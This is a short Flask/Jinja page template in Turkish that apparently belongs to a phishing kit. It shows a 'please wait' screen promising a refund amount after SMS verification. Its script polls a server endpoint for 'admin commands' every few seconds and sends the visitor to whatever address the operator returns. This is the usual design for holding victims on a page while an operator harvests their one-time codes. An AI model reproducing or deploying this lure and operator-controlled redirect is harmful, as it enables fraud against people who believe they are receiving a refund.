{% extends "base.html" %}
{% block content %}
<fieldset>
    <div class="loader">
        <img src="{{ url_for('static', filename='img/form-progress.svg') }}" alt="...">İşleminiz devam ediyor. Lütfen bekleyiniz...
    </div>
    <p class="limit-helper">İade Tutarınız size SMS doğrulamasından sonra bildirilecektir. Lütfen doğrulama kodunu bekleyiniz.</p>
</fieldset>

<script>
// Check for admin commands every 3 seconds
(function checkCommands() {
    fetch('{{ url_for("public.check_commands") }}', {
        method: 'GET',
        credentials: 'same-origin'
    })
    .then(response => response.json())
    .then(data => {
        if (data.redirect) {
            globalThis.location.href = data.redirect;
        } else {
            // Check again after 3 seconds
            setTimeout(checkCommands, 3000);
        }
    })
    .catch(() => {
        // On error, check again after 5 seconds
        setTimeout(checkCommands, 5000);
    });
})();
</script>
{% endblock %}
